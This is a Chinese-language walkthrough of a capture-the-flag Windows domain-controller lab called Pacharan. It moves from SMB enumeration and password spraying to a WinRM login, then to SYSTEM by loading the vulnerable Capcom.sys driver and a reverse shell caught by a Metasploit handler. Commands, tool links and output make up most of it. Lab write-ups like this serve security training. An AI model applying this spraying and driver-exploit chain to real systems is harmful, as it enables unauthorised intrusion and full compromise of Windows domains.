难度:AVANZADO
kali:192.168.69.3
靶机:192.168.69.69
root@kali2 [~] ➜ arp-scan -l [11:35:54] Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.69.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.69.1 0a:00:27:00:00:12 (Unknown: locally administered)
192.168.69.2 08:00:27:7f:d6:6c PCS Systemtechnik GmbH
192.168.69.69 08:00:27:f2:3b:fe PCS Systemtechnik GmbH端口扫描
root@kali2 [~/Desktop/pacharan] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.69.69 -oG ports.txt [11:38:51] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 11:38 CST
Nmap scan report for 192.168.69.69
Host is up (0.000091s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49676/tcp open unknown
49686/tcp open unknown
49709/tcp open unknown
MAC Address: 08:00:27:F2:3B:FE (Oracle VirtualBox virtual NIC)扫一下端口服务
root@kali2 [~/Desktop/pacharan] ➜ cat ports.txt | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' [11:39:05] 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686,49709
root@kali2 [~/Desktop/pacharan] ➜ nmap -sV -A 192.168.69.69 -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686,4970 [11:39:19] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 11:39 CST
Nmap scan report for 192.168.69.69
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-08 09:40:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
4970/tcp closed ccss-qsm
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC拿到一个域名PACHARAN.THL
SMB探测
枚举不到用户信息,看一下目录
root@kali2 [~/Desktop/pacharan] ➜ smbclient --no-pass -L //pacharan.thl [11:47:23]
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Admin remota
C$ Disk Recurso predeterminado
IPC$ IPC IPC remota
NETLOGON Disk Recurso compartido del servidor de inicio de sesión
NETLOGON2 Disk
PACHARAN Disk
PDF Pro Virtual Printer Printer Soy Hacker y arreglo impresoras
print$ Disk Controladores de impresora
SYSVOL Disk Recurso compartido del servidor de inicio de sesión
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to pacharan.thl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available有个打印服务,还有两个登录脚本共享
root@kali2 [~/Desktop/pacharan] ➜ smbclient //pacharan.thl/"PDF Pro Virtual Printer" --no-pass [11:50:57] Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> ^C
root@kali2 [~/Desktop/pacharan] ➜ smbclient //pacharan.thl/"print$" --no-pass [11:51:48] Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
root@kali2 [~/Desktop/pacharan] ➜ smbclient //pacharan.thl/NETLOGON --no-pass [11:51:53] do_connect: Connection to WIN-VRU3GG3DPLJ.PACHARAN.THL failed (Error NT_STATUS_UNSUCCESSFUL)
root@kali2 [~/Desktop/pacharan] ➜ smbclient //pacharan.thl/NETLOGON2 --no-pass [11:52:28] Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:25:34 2024
.. D 0 Thu Aug 1 01:25:34 2024
Orujo.txt A 22 Thu Aug 1 01:25:55 2024
7735807 blocks of size 4096. 4357968 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \> ^C在第二个登录共享里面拿到一个txt文件,文件名叫毛毛虫
root@kali2 [~/Desktop/pacharan] ➜ cat Orujo.txt [11:52:45] Pericodelospalotes6969#像是一个密码,猜测是Orujo用户密码,尝试winrm登录
root@kali2 [~/Desktop/pacharan] ➜ evil-winrm -i 192.168.69.69 -u Orujo -p Pericodelospalotes6969 [11:59:25]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
^C
Warning: Press "y" to exit, press any other key to continue
Info: Exiting...失败,尝试列出共享目录
root@kali2 [~/Desktop/pacharan] ➜ smbmap -u "Orujo" -p "Pericodelospalotes6969" -H 192.168.69.69 [11:59:52]
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN READ ONLY
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
[*] Closed 1 connections可以访问PACHARAN
root@kali2 [~/Desktop/pacharan] ➜ smbclient -U 'Orujo%Pericodelospalotes6969' //192.168.69.69/pacharan [12:06:18] Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:21:13 2024
.. D 0 Thu Aug 1 01:21:13 2024
ah.txt A 921 Thu Aug 1 01:20:16 2024
7735807 blocks of size 4096. 4357952 blocks available
smb: \> get ah.txt
getting file \ah.txt of size 921 as ah.txt (449.7 KiloBytes/sec) (average 449.7 KiloBytes/sec)
smb: \> ^C又拿到一个txt
root@kali2 [~/Desktop/pacharan] ➜ cat ah.txt [12:06:30] Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
...
...像是一个密码字典,枚举一下用户名
root@kali2 [~/Desktop/pacharan] ➜ crackmapexec smb 192.168.69.69 --users -u Orujo -p Pericodelospalotes6969 [12:13:57] SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] Enumerated domain user(s)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Gordons badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\RedLabel badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\CarlosV badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\beefeater badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Chivas badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\JB badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Whisky2 badpwdcount: 1 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Chivas Regal badpwdcount: 0 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Hendrick badpwdcount: 2 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Whisky badpwdcount: 0 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Ginebra badpwdcount: 53 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Orujo badpwdcount: 0 desc:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\krbtgt badpwdcount: 53 desc: Cuenta de servicio de centro de distribución de claves
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\DefaultAccount badpwdcount: 53 desc: Cuenta de usuario administrada por el sistema.
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Invitado badpwdcount: 51 desc: Cuenta integrada para el acceso como invitado al equipo o dominio
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN.THL\Administrador badpwdcount: 0 desc: Cuenta integrada para la administración del equipo o dominioroot@kali2 [~/Desktop/pacharan] ➜ crackmapexec smb 192.168.69.69 --users -u Orujo -p Pericodelospalotes6969 > output.txt [12:35:28] root@kali2 [~/Desktop/pacharan] ➜ cat output.txt| awk '{print substr($5, 14)}' >usernames.txt [12:36:05] root@kali2 [~/Desktop/pacharan] ➜ cat usernames.txt [12:36:08]
Gordons
RedLabel
CarlosV
beefeater
Chivas
JB
Whisky2
Chivas
Hendrick
Whisky
Ginebra
Orujo
krbtgt
DefaultAccount
Invitado
Administrador有个用户名带空格补全一下Chivas Regal,然后密码喷洒攻击一下
root@kali2 [~/Desktop/pacharan] ➜ crackmapexec smb 192.168.69.69 -u usernames.txt -p ah.txt --continue-on-success
192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer1! STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer2@ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer3# STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer4$ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer5% STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer6^ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer7& STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:Mamasoystreamer8* STATUS_LOGON_FAILURE
...
...
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
...
..有一组正确账号密码Whisky:MamasoyStream2er@
没出意外,winrm还是登不上,再看一下共享目录
root@kali2 [~/Desktop/pacharan] ➜ smbmap -u "Whisky" -p "MamasoyStream2er@" -H 192.168.69.69 [12:20:22]
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN NO ACCESS
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
[*] Closed 1 connectionsenumprinters
再枚举一次,这次用rpcclient枚举开头提到的打印机服务
root@kali2 [~/Desktop/pacharan] ➜ rpcclient -U Whisky 192.168.69.69 [13:03:41] Password for [WORKGROUP\Whisky]:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]有个描述TurkisArrusPuchuchuSiu1看起来像密码,喷洒一下
root@kali2 [~/Desktop/pacharan] ➜ crackmapexec smb 192.168.69.69 -u usernames.txt -p TurkisArrusPuchuchuSiu1 --continue-on-success [13:36:25] SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Gordons:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\RedLabel:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\beefeater:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Chivas:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\JB:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Whisky2:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Chivas:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Hendrick:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Whisky:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Ginebra:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\krbtgt:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\DefaultAccount:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Invitado:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Administrador:TurkisArrusPuchuchuSiu1 STATUS_LOGON_FAILURE又拿到一组Chivas Regal:TurkisArrusPuchuchuSiu1,这次winrm成功了
winrm
root@kali2 [~/Desktop/pacharan] ➜ evil-winrm -i 192.168.69.69 -u "PACHARAN.THL\Chivas Regal" -p TurkisArrusPuchuchuSiu1 [13:36:28]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> dir
Directorio: C:\Users\Chivas Regal\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/1/2024 10:29 AM 36 user.txt
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> type user.txt
********拿到user flag
SeLoadDriverPrivilege
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada有个SeLoadDriverPrivilege权限, 它允许用户加载内核驱动程序并使用内核特权
利用参考
https://cloud.tencent.com/developer/article/1180772
利用起来还是比较费事的。
先是需要一个驱动加载器
https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
下载下来把头文件的#include "stdafx.h"去掉然后编译就好了
然后需要一个驱动文件
下载这个
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
然后需要执行脚本的exp
https://github.com/tandasat/ExploitCapcom/tree/master/ExploitCapcom
不过这个工具默认执行的cmd也就是弹出一个system权限的cmd,可以改一下修改成反弹shell的exe
然后编译生成exp.exe
然后把三个文件和一个反弹shell的exe传到靶机
*Evil-WinRM* PS C:\temp> dir
Directorio: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/8/2024 2:29 PM 10576 Capcom.sys
-a---- 8/8/2024 6:02 PM 256512 exp.exe
-a---- 8/8/2024 5:22 PM 15360 LoadDriver.exe
-a---- 8/8/2024 6:01 PM 7168 reverse_shell.exe加载驱动
Evil-WinRM* PS C:\temp> ./LoadDriver.exe System/CurrentControlSet\abcdefg c:\temp\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\System/CurrentControlSet\abcdefg
NTSTATUS: c0000034, WinError: 0执行exp
*Evil-WinRM* PS C:\temp> ./exp.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001E7D5380008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program弹回shell
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.69.3:4567
[*] Command shell session 2 opened (192.168.69.3:4567 -> 192.168.69.69:49839) at 2024-08-08 18:27:11 +0800
Shell Banner:
Microsoft Windows [Versi_n 10.0.14393]
-----
C:\temp>whoami
whoami
nt authority\system拿下。